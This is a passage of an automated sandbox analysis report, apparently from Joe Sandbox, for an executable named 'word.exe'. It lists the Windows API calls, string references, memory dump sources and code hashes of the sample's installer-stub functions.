                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
                                                          • Instruction ID: 23c8d3588392bc678d7246373841442171ea5a50e124834ae8740ae97285bd87
                                                          • Opcode Fuzzy Hash: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
                                                          • Instruction Fuzzy Hash: FD218C71900508BADB119FA5DD84ADFBFA9EF14354F14807AF504B6290C2799A41CFA8
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                                          • GetTickCount.KERNEL32 ref: 00402C10
                                                          • wsprintfA.USER32 ref: 00402C3E
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                                            • Part of subcall function 00402BBE: MulDiv.KERNEL32(00000000,?,0005B071), ref: 00402BD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
                                                          • Instruction ID: 37d10fed78b44bbf962512fa666ce1a12177f0d23356d60e90fa74daf698f4f0
                                                          • Opcode Fuzzy Hash: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
                                                          • Instruction Fuzzy Hash: 900165B0949614ABDB216F64AE4DE9F7B78BB01701714C037FA01B11E1C6B8D541CB9E
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
                                                          • GetMessagePos.USER32 ref: 004048CA
                                                          • ScreenToClient.USER32(?,?), ref: 004048E4
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                          • Instruction ID: add3c7f7873227bd74a4bce1351eac807b502806bceb4e0d6bae9f806a4b5eb6
                                                          • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                          • Instruction Fuzzy Hash: 61014C75D00218BAEB11DBA4DC85BFFBBBCAB55711F10412BBA10B62C0C7B4A9018BA5
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                          • wsprintfA.USER32 ref: 00402B91
                                                          • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
                                                          • Instruction ID: 1ce9201bfa48cab7b8fa553f1801af8382b39519b903b04a6adfa3bfa778fb21
                                                          • Opcode Fuzzy Hash: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
                                                          • Instruction Fuzzy Hash: 0DF01D70900208ABEF215F61CD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 00401CD0
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                          • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 8c1d5d282e63fa750a7411733debfdae667bc57b8f94cb70390eb4c580c11dbe
                                                          • Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
                                                          • Opcode Fuzzy Hash: 8c1d5d282e63fa750a7411733debfdae667bc57b8f94cb70390eb4c580c11dbe
                                                          • Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79
                                                          APIs
                                                          • lstrlenA.KERNEL32(0041FCF8,0041FCF8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004046E5,000000DF,0000040F,00000400,00000000), ref: 00404853
                                                          • wsprintfA.USER32 ref: 0040485B
                                                          • SetDlgItemTextA.USER32(?,0041FCF8), ref: 0040486E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
                                                          • Instruction ID: 1dbe8f306e20f990bcdfb4b2d97c48a080c9d40feb998d0653c6b80998781608
                                                          • Opcode Fuzzy Hash: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
                                                          • Instruction Fuzzy Hash: CE11347360012437CB1062699C49EEF3249CBC2334F24823BFA25F71D1E9788C5282E8
                                                          APIs
                                                          • SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID: "C:\Users\user\Desktop\word.exe"$+/R$1033
                                                          • API String ID: 530164218-4287074229
                                                          • Opcode ID: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
                                                          • Instruction ID: afbb14256cc631d10caee281dea517f3a5a89f89e2cd0ba730366887019fa8a8
                                                          • Opcode Fuzzy Hash: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
                                                          • Instruction Fuzzy Hash: A411C2B1B04610ABC724DF15DC8092377BDEB84716328813BA84167391C63D9E029A98
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405787
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405790
                                                          • lstrcatA.KERNEL32(?,00409014), ref: 004057A1
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405781
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3355392842
                                                          • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                          • Instruction ID: 5d0f413141f52f4d8e8af186490daeb449751c8a1e5703fa5fe58453a807c488
                                                          • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                          • Instruction Fuzzy Hash: A4D0C9A2A059306AD3122655AC09F9B6A48CF56755B099077F200B62A2C67C5D418FFE
                                                          APIs
                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                          • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                            • Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
                                                          • Instruction ID: daf777410944a799184fcc454f008e4928398c379a2567b3caca2a2cde185cee
                                                          • Opcode Fuzzy Hash: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
                                                          • Instruction Fuzzy Hash: 1B115EB1900208BEDB01EFA5D941DAEBBB9EF04344B20807AF505F61A1D7389E54EB28
                                                          APIs
                                                          • CharNextA.USER32(?,?,C:\,?,00405886,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405828
                                                          • CharNextA.USER32(00000000), ref: 0040582D
                                                          • CharNextA.USER32(00000000), ref: 00405841
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext
                                                          • String ID: C:\
                                                          • API String ID: 3213498283-3404278061
                                                          • Opcode ID: b9521f7bc1000ed8736d0cfea6427d8fadcdebcb8218d11fad191aaefdea5298
                                                          • Instruction ID: ec77af8a3f3e327efabc47ec9ad7f814260ebf35776ba6c608f1767ad00b0db6
                                                          • Opcode Fuzzy Hash: b9521f7bc1000ed8736d0cfea6427d8fadcdebcb8218d11fad191aaefdea5298
                                                          • Instruction Fuzzy Hash: CBF06253904F506BFB3272351C44B7B5B88CB55355F18C87BEE50A62C2827C48614F9A
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404F7F
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0
                                                            • Part of subcall function 00404038: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040404A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
                                                          • Instruction ID: e4ca6dfb8be9ac33f077af52de3e350fef620c5d1e65b576c63f1805fc4ef9c4
                                                          • Opcode Fuzzy Hash: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
                                                          • Instruction Fuzzy Hash: 1801D4B160420AAFDF209F50DD80A9B3B66FBC0315F144137FB00B52D1D7398C51A669
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll, xrefs: 004024DD, 00402502
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileWritelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll
                                                          • API String ID: 427699356-2192832599
                                                          • Opcode ID: 55a763082a11604e42dd3a7e23fb23cc49d380056e752e231f9721a2dfb866ba
                                                          • Instruction ID: 15837e18a0899aebe372c1c9672940312f560d5d25332acc002067b6f94eb92f
                                                          • Opcode Fuzzy Hash: 55a763082a11604e42dd3a7e23fb23cc49d380056e752e231f9721a2dfb866ba
                                                          • Instruction Fuzzy Hash: 78F089B2A54244BFDB40EBB09E499EB76A4DB50305F14443FF141F61C2D6FC4941A76E
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
                                                          • CloseHandle.KERNEL32(?), ref: 004054D6
                                                          Strings
                                                          • Error launching installer, xrefs: 004054B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
                                                          • Instruction ID: 1668edf84edc795d90e5179e363d58f44986d7750dcb732495ea53e78f2e035e
                                                          • Opcode Fuzzy Hash: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
                                                          • Instruction Fuzzy Hash: 8AE0E674A00209BBDB109FA4DD05A6B77BCEB14345B508561B911E2160E774D9548A79
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77582EE0,004036C9,77583410,004034D6,?), ref: 0040370C
                                                          • GlobalFree.KERNEL32(0051DEC0), ref: 00403713
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403704
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
